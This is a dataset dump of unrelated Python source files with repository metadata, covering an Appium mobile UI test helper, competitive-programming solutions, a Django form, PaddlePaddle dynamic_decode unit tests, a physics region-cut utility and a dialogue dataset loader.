self._driver.find_element_by_android_uiautomator('new UiSelector().text("关注")').click()
self._driver.find_element_by_android_uiautomator('new UiScrollable(new UiSelector().'
'scrollable(true).instance(0)).'
'scrollIntoView(new UiSelector().text("玉山落雨").'
'instance(0));').click()
sleep(5)
def toast(self):
print(self._driver.page_source)
def clear(self, locator):
self.find(locator).clear()
def search_get_price(self, value, code):
self.click(self._search_input)
self.text(self._search_text, value)
self.click(self._search_result_first)
price = self.text((self._result_price_with_code[0], self._result_price_with_code[1].replace("$code", code)))
self.click(self._close_search)
return price
def mobile_call(self, phone_number="13883256868", action=GsmCallActions.CALL):
"""mumu 模拟器不支持,需要使用原生的"""
# action:
# GsmCallActions.CALL
# GsmCallActions.ACCEPT
# GsmCallActions.CANCEL
# GsmCallActions.HOLD
self._driver.make_gsm_call(phone_number, action)
def msg(self, phone_number="13537773695", message="Hello world!"):
"""mumu 模拟器不支持,需要使用原生的"""
self._driver.send_sms(phone_number, message)
def network(self, connection_type=1):
self._driver.set_network_connection(connection_type)
sleep(3)
self._driver.set_network_connection(6)
sleep(3)
def screenshot_as_file(self, path="./photos/img.png"):
self._driver.get_screenshot_as_file(path)
def webview(self):
self.click((self._tab[0], self._tab[1].replace("$tab", "交易")))
sleep(10)
print(self._driver.contexts)
# 立即开户,切换到 webview
self._driver.switch_to.context(self._driver.contexts[-1])
sleep(10)
# print(self._driver.window_handles)
loc1 = (MobileBy.XPATH, "//*[id='Layout_app_3V4']/div/div/ul/li[1]/div[2]/h1")
WebDriverWait(self._driver, 10).until(EC.element_to_be_clickable(loc1))
self.click(loc1)
sleep(10)
handle = self._driver.window_handles[-1]
self._driver.switch_to.window(handle)
# 开户信息填写
loc2 = (MobileBy.ID, "phone-number")
loc3 = (MobileBy.ID, "code")
loc4 = (MobileBy.CSS_SELECTOR, ".btn-submit")
self.text(loc2, "13810120202")
self.text(loc3, "6666")
self.click(loc4)
| [
"[email protected]"
] | |
e232ea8556be487081ad7ae17a32d47bd88efdad | 31e6ca145bfff0277509dbd7c4b44b8deddf3334 | /LeetCode/Graph/combination-sum.py | 1bad4a940655a4357b9828e4c8a4c2eb18a168a3 | [] | no_license | brillantescene/Coding_Test | 2582d6eb2d0af8d9ac33b8e829ff8c1682563c42 | 0ebc75cd66e1ccea3cedc24d6e457b167bb52491 | refs/heads/master | 2023-08-31T06:20:39.000734 | 2021-10-15T10:51:17 | 2021-10-15T10:51:17 | 254,366,460 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 459 | py | class Solution:
def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:
result = []
def dfs(csum, index, path):
if csum < 0:
return
if csum == 0:
result.append(path)
return
for i in range(index, len(candidates)):
dfs(csum-candidates[i], i, path+[candidates[i]])
dfs(target, 0, [])
return result
| [
"[email protected]"
] | |
77fd709015fd652698b0f4af3bad2db95658244b | 9766c2e479e99cca5bf7cc834c949fc4d5286275 | /TEST/GUI/00190_page_bdyanalysis/cleanup.py | 016dd73ae3dc45790df8a484acfe062a7795a6de | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | UstbCmsPjy/OOF2 | 4c141e8da3c7e3c5bc9129c2cb27ed301455a155 | f8539080529d257a02b8f5cc44040637387ed9a1 | refs/heads/master | 2023-05-05T09:58:22.597997 | 2020-05-28T23:05:30 | 2020-05-28T23:05:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26 | py | removefile('bdyanal.log')
| [
"[email protected]"
] | |
5588a9b58bb4811699015d008966309f1b432923 | 76a01339f7ca19536a07d66e18ff427762157a2a | /codeforces/Python/serval_and_bus.py | 49a999fb8f0c58c2e96f04c61667f1b963aee56a | [] | no_license | shaarangg/CP-codes | 75f99530921a380b93d8473a2f2a588dc35b0beb | 94fc49d0f20c02da69f23c74e26c974dfe122b2f | refs/heads/main | 2023-07-19T21:31:40.011853 | 2021-09-07T05:22:28 | 2021-09-07T05:22:28 | 332,644,437 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | n,t = map(int,input().split())
m=10**9
j=0
for i in range(n):
s,d = map(int,input().split())
if(t<=s):
a=s-t
else:
a=t-s
if(a%d==0):
a=0
else:
a = (a//d + 1)*d -t + s
if(m>a):
m=a
j=i+1
print(j) | [
"[email protected]"
] | |
a20ec095f9065df80a1ba32f675716abe0875c05 | 26c4426d2c9cd10fd7d4a73609512e69e31b64ba | /justone/mayflower/products/forms.py | 452a35e79f1ecaab5846dfb47812af7c3869b763 | [] | no_license | KirillUdod/html2exc | 550761213eb6edd7d3ea4787938cce65584606c3 | 60569f01822a15b2e5b6884a42774cd428953700 | refs/heads/master | 2021-01-15T17:07:05.906492 | 2016-01-06T11:51:38 | 2016-01-06T11:51:38 | 34,809,072 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,453 | py | from django import forms
from products.models import Bouquet
class DependenciesForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(DependenciesForm, self).__init__(*args, **kwargs)
instance = getattr(self, 'instance', None)
dependencies = getattr(self.Meta.model, 'dependencies', {})
if isinstance(dependencies, dict):
for (depend_field, depend_field_value), fields in dependencies.iteritems():
if not isinstance(self.fields[depend_field], forms.BooleanField)\
and not getattr(self.fields[depend_field], 'choices', None):
raise ValueError()
if not isinstance(fields, (list, tuple)):
fields = [fields]
required = False
if self.data:
post_value = self.data.get(self.add_prefix(depend_field))
if post_value == 'on' and isinstance(depend_field_value, bool):
post_value = 'True'
if post_value == unicode(depend_field_value):
required = True
elif instance and getattr(instance, depend_field, None) == depend_field_value:
required = True
for field in fields:
self.fields[field].required = required
class BouquetAdminForm(DependenciesForm):
class Meta:
model = Bouquet | [
"[email protected]"
] | |
b19d04a16672a6e82ef0ac5031a632a46feb1e78 | bb150497a05203a718fb3630941231be9e3b6a32 | /framework/api/nn/test_dynamicdecode.py | 3dfc0093a772141b2e3a8044746f517ce9ae1b98 | [] | no_license | PaddlePaddle/PaddleTest | 4fb3dec677f0f13f7f1003fd30df748bf0b5940d | bd3790ce72a2a26611b5eda3901651b5a809348f | refs/heads/develop | 2023-09-06T04:23:39.181903 | 2023-09-04T11:17:50 | 2023-09-04T11:17:50 | 383,138,186 | 42 | 312 | null | 2023-09-13T11:13:35 | 2021-07-05T12:44:59 | Python | UTF-8 | Python | false | false | 20,209 | py | #!/bin/env python
# -*- coding: utf-8 -*-
# encoding=utf-8 vi:ts=4:sw=4:expandtab:ft=python
"""
test paddle.nn.dynamic_decode
"""
import random
import paddle
from apibase import compare
import pytest
import numpy as np
from paddle.nn import BeamSearchDecoder, dynamic_decode
from paddle.nn import GRUCell, Linear, Embedding, LSTMCell
from paddle.nn import TransformerDecoderLayer, TransformerDecoder
np.random.seed(2)
random.seed(2)
paddle.seed(2)
class ModelGRUCell4(paddle.nn.Layer):
"""
GRUCell model
"""
def __init__(self):
"""
initialize
"""
super(ModelGRUCell4, self).__init__()
self.trg_embeder = Embedding(100, 32)
self.output_layer = Linear(32, 32)
self.decoder_cell = GRUCell(input_size=32, hidden_size=32)
self.decoder = BeamSearchDecoder(
self.decoder_cell,
start_token=0,
end_token=1,
beam_size=4,
embedding_fn=self.trg_embeder,
output_fn=self.output_layer,
)
def forward(self):
"""
forward
"""
encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
outputs = dynamic_decode(
decoder=self.decoder, inits=self.decoder_cell.get_initial_states(encoder_output), max_step_num=10
)
return outputs[0]
class ModelGRUCell5(paddle.nn.Layer):
"""
GRUCell model1
"""
def __init__(self):
"""
initialize
"""
super(ModelGRUCell5, self).__init__()
self.trg_embeder = Embedding(100, 32)
self.output_layer = Linear(32, 32)
self.decoder_cell = GRUCell(input_size=32, hidden_size=32)
self.decoder = BeamSearchDecoder(
self.decoder_cell,
start_token=0,
end_token=1,
beam_size=4,
embedding_fn=self.trg_embeder,
output_fn=self.output_layer,
)
def forward(self):
"""
forward
"""
encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
outputs = dynamic_decode(
decoder=self.decoder,
inits=self.decoder_cell.get_initial_states(encoder_output),
output_time_major=True,
max_step_num=10,
)
return outputs[0]
class ModelGRUCell6(paddle.nn.Layer):
"""
GRUCell model2
"""
def __init__(self):
"""
initialize
"""
super(ModelGRUCell6, self).__init__()
self.trg_embeder = Embedding(100, 32)
self.output_layer = Linear(32, 32)
self.decoder_cell = GRUCell(input_size=32, hidden_size=32)
self.decoder = BeamSearchDecoder(
self.decoder_cell,
start_token=0,
end_token=1,
beam_size=4,
embedding_fn=self.trg_embeder,
output_fn=self.output_layer,
)
def forward(self):
"""
forward
"""
encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
outputs = dynamic_decode(
decoder=self.decoder,
inits=self.decoder_cell.get_initial_states(encoder_output),
is_test=True,
max_step_num=10,
)
return outputs[0]
class ModelGRUCell7(paddle.nn.Layer):
"""
GRUCell model3
"""
def __init__(self):
"""
initialize
"""
super(ModelGRUCell7, self).__init__()
self.trg_embeder = Embedding(100, 32)
self.output_layer = Linear(32, 32)
self.decoder_cell = GRUCell(input_size=32, hidden_size=32)
self.decoder = BeamSearchDecoder(
self.decoder_cell,
start_token=0,
end_token=1,
beam_size=4,
embedding_fn=self.trg_embeder,
output_fn=self.output_layer,
)
def forward(self):
"""
forward
"""
encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
outputs = dynamic_decode(
decoder=self.decoder,
inits=self.decoder_cell.get_initial_states(encoder_output),
impute_finished=True,
max_step_num=10,
)
return outputs[0]
class ModelGRUCell8(paddle.nn.Layer):
"""
GRUCell model4
"""
def __init__(self):
"""
initialize
"""
super(ModelGRUCell8, self).__init__()
self.trg_embeder = Embedding(100, 32)
self.output_layer = Linear(32, 32)
self.decoder_cell = GRUCell(input_size=32, hidden_size=32)
self.decoder = BeamSearchDecoder(
self.decoder_cell,
start_token=0,
end_token=1,
beam_size=4,
embedding_fn=self.trg_embeder,
output_fn=self.output_layer,
)
def forward(self):
"""
forward
"""
encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
outputs = dynamic_decode(
decoder=self.decoder,
inits=self.decoder_cell.get_initial_states(encoder_output),
return_length=True,
max_step_num=10,
)
return outputs[2]
class ModelLSTMCell1(paddle.nn.Layer):
"""
LSTMCell model
"""
def __init__(self):
"""
initialize
"""
super(ModelLSTMCell1, self).__init__()
self.trg_embeder = Embedding(100, 32)
self.output_layer = Linear(32, 32)
self.decoder_cell = LSTMCell(input_size=32, hidden_size=32)
self.decoder = BeamSearchDecoder(
self.decoder_cell,
start_token=0,
end_token=1,
beam_size=4,
embedding_fn=self.trg_embeder,
output_fn=self.output_layer,
)
def forward(self):
"""
forward
"""
encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
outputs = dynamic_decode(
decoder=self.decoder, inits=self.decoder_cell.get_initial_states(encoder_output), max_step_num=10
)
return outputs[0]
class ModelLSTMCell2(paddle.nn.Layer):
"""
LSTMCell model1
"""
def __init__(self):
"""
initialize
"""
super(ModelLSTMCell2, self).__init__()
self.trg_embeder = Embedding(100, 16)
self.output_layer = Linear(16, 16)
self.decoder_cell = LSTMCell(input_size=16, hidden_size=16)
self.decoder = BeamSearchDecoder(
self.decoder_cell,
start_token=0,
end_token=1,
beam_size=4,
embedding_fn=self.trg_embeder,
output_fn=self.output_layer,
)
def forward(self):
"""
forward
"""
encoder_output = paddle.ones((4, 4, 16), dtype=paddle.get_default_dtype())
outputs = dynamic_decode(
decoder=self.decoder, inits=self.decoder_cell.get_initial_states(encoder_output), max_step_num=10
)
return outputs[0]
class ModelLSTMCell3(paddle.nn.Layer):
"""
LSTMCell model2
"""
def __init__(self):
"""
initialize
"""
super(ModelLSTMCell3, self).__init__()
self.trg_embeder = Embedding(100, 32)
self.output_layer = Linear(32, 32)
self.decoder_cell = LSTMCell(input_size=32, hidden_size=32)
self.decoder = BeamSearchDecoder(
self.decoder_cell,
start_token=0,
end_token=1,
beam_size=4,
embedding_fn=self.trg_embeder,
output_fn=self.output_layer,
)
def forward(self):
"""
forward
"""
encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
outputs = dynamic_decode(
decoder=self.decoder, inits=self.decoder_cell.get_initial_states(encoder_output), max_step_num=5
)
return outputs[0]
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode0():
"""
GRUCell
"""
# paddle.seed(33)
m = ModelGRUCell4()
a = paddle.load("model/model_grucell4")
m.set_state_dict(a)
res = [
[
[23, 23, 23, 23],
[9, 23, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 23, 27],
],
[
[23, 23, 23, 23],
[9, 23, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 23, 27],
],
[
[23, 23, 23, 23],
[9, 23, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 23, 27],
],
[
[23, 23, 23, 23],
[9, 23, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 23, 27],
],
]
compare(m().numpy(), res)
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode1():
"""
change the decoder cell to LSTMCell
"""
m = ModelLSTMCell1()
a = paddle.load("model/model_lstmcell1")
m.set_state_dict(a)
res = [
[
[4, 4, 22, 4],
[4, 4, 4, 4],
[30, 20, 20, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 20],
],
[
[4, 4, 22, 4],
[4, 4, 4, 4],
[30, 20, 20, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 20],
],
[
[4, 4, 22, 4],
[4, 4, 4, 4],
[30, 20, 20, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 20],
],
[
[4, 4, 22, 4],
[4, 4, 4, 4],
[30, 20, 20, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 30],
[30, 30, 30, 20],
],
]
compare(m().numpy(), res)
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode2():
"""
change the input size
"""
m = ModelLSTMCell2()
a = paddle.load("model/model_lstmcell2")
m.set_state_dict(a)
res = [
[
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 9, 9],
[4, 9, 9, 4],
],
[
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 9, 9],
[4, 9, 9, 4],
],
[
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 9, 9],
[4, 9, 9, 4],
],
[
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 4, 4],
[4, 4, 9, 9],
[4, 9, 9, 4],
],
]
compare(m().numpy(), res)
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode3():
"""
change the max_step_num
"""
m = ModelLSTMCell3()
a = paddle.load("model/model_lstmcell3")
m.set_state_dict(a)
res = [
[[4, 4, 22, 4], [4, 4, 4, 4], [30, 20, 20, 30], [30, 30, 30, 30], [30, 30, 30, 30], [30, 30, 30, 20]],
[[4, 4, 22, 4], [4, 4, 4, 4], [30, 20, 20, 30], [30, 30, 30, 30], [30, 30, 30, 30], [30, 30, 30, 20]],
[[4, 4, 22, 4], [4, 4, 4, 4], [30, 20, 20, 30], [30, 30, 30, 30], [30, 30, 30, 30], [30, 30, 30, 20]],
[[4, 4, 22, 4], [4, 4, 4, 4], [30, 20, 20, 30], [30, 30, 30, 30], [30, 30, 30, 30], [30, 30, 30, 20]],
]
compare(m().numpy(), res)
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode4():
"""
set the output_time_major True
"""
m = ModelGRUCell5()
a = paddle.load("model/model_grucell5")
m.set_state_dict(a)
res = [
[[23, 23, 23, 23], [23, 23, 23, 23], [23, 23, 23, 23], [23, 23, 23, 23]],
[[9, 23, 9, 9], [9, 23, 9, 9], [9, 23, 9, 9], [9, 23, 9, 9]],
[[9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9]],
[[9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9]],
[[9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9]],
[[9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9]],
[[9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9]],
[[9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9]],
[[9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9]],
[[9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9], [9, 9, 9, 9]],
[[9, 9, 23, 27], [9, 9, 23, 27], [9, 9, 23, 27], [9, 9, 23, 27]],
]
compare(m().numpy(), res)
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode5():
"""
set the is_test True
"""
m = ModelGRUCell6()
a = paddle.load("model/model_grucell6")
m.set_state_dict(a)
res = [
[
[23, 23, 23, 23],
[9, 23, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 23, 27],
],
[
[23, 23, 23, 23],
[9, 23, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 23, 27],
],
[
[23, 23, 23, 23],
[9, 23, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 23, 27],
],
[
[23, 23, 23, 23],
[9, 23, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 23, 27],
],
]
compare(m().numpy(), res)
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode6():
"""
set the impute_finished True
"""
m = ModelGRUCell7()
a = paddle.load("model/model_grucell7")
m.set_state_dict(a)
res = [
[
[23, 23, 23, 23],
[9, 23, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 23, 27],
],
[
[23, 23, 23, 23],
[9, 23, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 23, 27],
],
[
[23, 23, 23, 23],
[9, 23, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 23, 27],
],
[
[23, 23, 23, 23],
[9, 23, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 9, 9],
[9, 9, 23, 27],
],
]
compare(m().numpy(), res)
@pytest.mark.api_nn_dynamic_decode_parameters
def test_dynamic_decode7():
"""
set the return_length True
"""
m = ModelGRUCell8()
a = paddle.load("model/model_grucell8")
m.set_state_dict(a)
res = [[11, 11, 11, 11], [11, 11, 11, 11], [11, 11, 11, 11], [11, 11, 11, 11]]
compare(m().numpy(), res)
@pytest.mark.api_nn_dynamic_decode_exception
def test_dynamic_decode10():
"""
Decoder type error
"""
decoder_cell = LSTMCell(input_size=32, hidden_size=32)
output_layer = TransformerDecoderLayer(32, 2, 128)
decoder = TransformerDecoder(output_layer, 2)
encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
try:
dynamic_decode(decoder=decoder, inits=decoder_cell.get_initial_states(encoder_output), max_step_num=10)
except Exception as e:
# print(e)
if "object has no attribute 'initialize'" in e.args[0]:
pass
else:
raise Exception
@pytest.mark.skip(reason="RD代码异常改变,此Case会报错,暂时跳过")
@pytest.mark.api_nn_dynamic_decode_exception
def test_dynamic_decode11():
"""
No parameters passed to inits
"""
paddle.seed(33)
trg_embeder = Embedding(100, 32)
output_layer = Linear(32, 32)
decoder_cell = GRUCell(input_size=32, hidden_size=32)
decoder = BeamSearchDecoder(
decoder_cell, start_token=0, end_token=1, beam_size=4, embedding_fn=trg_embeder, output_fn=output_layer
)
try:
dynamic_decode(decoder=decoder, max_step_num=5)
except Exception as e:
# print(e)
error = "'NoneType' object has no attribute 'dtype'"
if error in e.args[0]:
pass
else:
raise Exception
@pytest.mark.skip(reason="RD代码异常改变,此Case会报错,暂时跳过")
@pytest.mark.api_nn_dynamic_decode_exception
def test_dynamic_decode12():
"""
the size of inits mismatch the size of the decoder
"""
paddle.seed(33)
trg_embeder = Embedding(100, 32)
output_layer = Linear(32, 32)
decoder_cell = LSTMCell(input_size=32, hidden_size=32)
decoder = BeamSearchDecoder(
decoder_cell, start_token=0, end_token=1, beam_size=4, embedding_fn=trg_embeder, output_fn=output_layer
)
encoder_output = paddle.ones((4, 8, 32), dtype=paddle.get_default_dtype())
decoder_initial_states = [
decoder_cell.get_initial_states(encoder_output, shape=[16]),
decoder_cell.get_initial_states(encoder_output, shape=[16]),
]
try:
dynamic_decode(decoder=decoder, inits=decoder_initial_states, max_step_num=5)
except Exception as e:
if "[operator < matmul_v2 > error]" in e.args[0]:
pass
else:
raise Exception
| [
"[email protected]"
] | |
ec1d8c4d661870efcce6dd2ea0b18baee2087b45 | f21109a5c23340447d0e3d34f14299c30e49d023 | /Dynamic Programming/11. Longest Common Subsequence.py | a8f0e898a3fad5f7001ac206032d7ee02a013de3 | [] | no_license | ShashankSinha98/FAANG-Questions | 45366004c3176a3c11ef554a25a11fe21e53ebca | 73ef742b3747e89d32d384baa6acf35044bf3ce0 | refs/heads/master | 2022-12-21T09:42:51.796086 | 2020-09-24T08:24:47 | 2020-09-24T08:24:47 | 286,765,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 598 | py | t = int(input())
def common_lcs(str1,n,str2,m):
dp = [[0]*(m+1) for i in range(n+1)]
for i in range(1,n+1):
for j in range(1,m+1):
if str1[i-1]==str2[j-1]:
dp[i][j] = dp[i-1][j-1] + 1
else:
dp[i][j] = max(dp[i-1][j],dp[i][j-1])
return dp[n][m]
def display(arr):
for i in arr:
for j in i:
print(j,end=" ")
print()
print()
while t!=0:
t-=1
n,m = [int(i) for i in input().split()]
str1 = input()
str2 = input()
res = common_lcs(str1,n,str2,m)
print(res) | [
"[email protected]"
] | |
f6813e579cbf76ee872102859d44f28c4c47746b | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03107/s767358209.py | f9a07c556a610f1f56bccfb4d8bc42ed0285d230 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | s = input()
red = s.count("0")
blue = s.count("1")
num = min(red,blue)
print(num*2) | [
"[email protected]"
] | |
446d6d7faa595deb53a808126c8a2aced62533ca | 00b86f883694b17575a514227960b963d3b6179b | /Analysis/python/regions.py | fd5293018c7e89c2e26d88fe5e64bddca3efeb61 | [] | no_license | HephyAnalysisSW/TTZRun2EFT | 1b33a6bad49d0d6e119e49c74faa35dee0e4bb0e | 730a7465d4cbde52649965ed0e2a5b29bcc309c3 | refs/heads/master | 2020-04-30T16:40:46.454225 | 2019-04-18T08:09:46 | 2019-04-18T08:09:46 | 176,956,090 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,950 | py | from TTZRun2EFT.Analysis.Region import Region
from TTZRun2EFT.Analysis.Region import texString
from TTZRun2EFT.Analysis.Region import allowedVars
from math import pi
def getRegionsFromThresholds(var, vals, gtLastThreshold = True):
return [Region(var, (vals[i], vals[i+1])) for i in range(len(vals)-1)]
def getRegions2D(varOne, varOneThresholds, varTwo, varTwoThresholds):
regions_varOne = getRegionsFromThresholds(varOne, varOneThresholds)
regions_varTwo = getRegionsFromThresholds(varTwo, varTwoThresholds)
regions2D = []
for r1 in regions_varOne:
for r2 in regions_varTwo:
regions2D.append(r1+r2)
return regions2D
def simpleStringToDict( simpleString ):
# replace variables by a string not containing "_"
for i, var in enumerate(allowedVars):
simpleString = simpleString.replace(var, "var%i"%i)
cutList = simpleString.split("_")
# convert simpleString to threshold tuple, fill in dict
cutDict = {}
for cut in cutList:
for i, var in enumerate(allowedVars):
if "var"+str(i) in cut:
cutRange = cut.replace("var%i"%i, "")
cutRange = cutRange.split("To")
cutRange = tuple( map( float, cutRange ) )
if len(cutRange) == 1: cutRange = ( cutRange[0], -1 )
cutDict.update( {var:cutRange} )
return cutDict
def dictToCutString( dict ):
res=[]
for var in dict.keys():
svar = var
s1=svar+">="+str(dict[var][0])
if dict[var][1]>-1: s1+="&&"+svar+"<"+str(dict[var][1])
res.append(s1)
return "&&".join(res)
def simpleStringToCutString( cutString ):
return dictToCutString( simpleStringToDict( cutString ) )
#Put all sets of regions that are used in the analysis, closure, tables, etc.
#differencial
thresholds = [ 20, 120, 220, 320, 420, -999 ]
genTTZRegions = getRegionsFromThresholds( "GenPhoton_pt[0]", thresholds )
| [
"[email protected]"
] | |
f0b5d8049387f82fdc10423ed90621cbe0c3bdef | 444a9480bce2035565332d4d4654244c0b5cd47b | /research/nlp/dgu/src/dataset.py | b0e7e7d67e9e558b44bf62623dcbbab8f34c71a8 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-proprietary-license"
] | permissive | mindspore-ai/models | 7ede9c6454e77e995e674628204e1c6e76bd7b27 | eab643f51336dbf7d711f02d27e6516e5affee59 | refs/heads/master | 2023-07-20T01:49:34.614616 | 2023-07-17T11:43:18 | 2023-07-17T11:43:18 | 417,393,380 | 301 | 92 | Apache-2.0 | 2023-05-17T11:22:28 | 2021-10-15T06:38:37 | Python | UTF-8 | Python | false | false | 21,879 | py | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
dataset used in Bert finetune and evaluation.
"""
import os
from typing import List
import numpy as np
# The input data bigin with '[CLS]', using '[SEP]' split conversation content(
# Previous part, current part, following part, etc.). If there are multiple
# conversation in split part, using 'INNER_SEP' to further split.
INNER_SEP = '[unused0]'
class Dataset():
""" Dataset base class """
def __init__(self):
pass
def __getitem__(self, idx):
raise NotImplementedError("'{}' not implement in class " \
"{}".format('__getitem__', self.__class__.__name__))
def __len__(self):
raise NotImplementedError("'{}' not implement in class " \
"{}".format('__len__', self.__class__.__name__))
def get_label_map(label_list):
""" Create label maps """
label_map = {}
for (i, l) in enumerate(label_list):
label_map[l] = i
return label_map
class UDCv1(Dataset):
"""
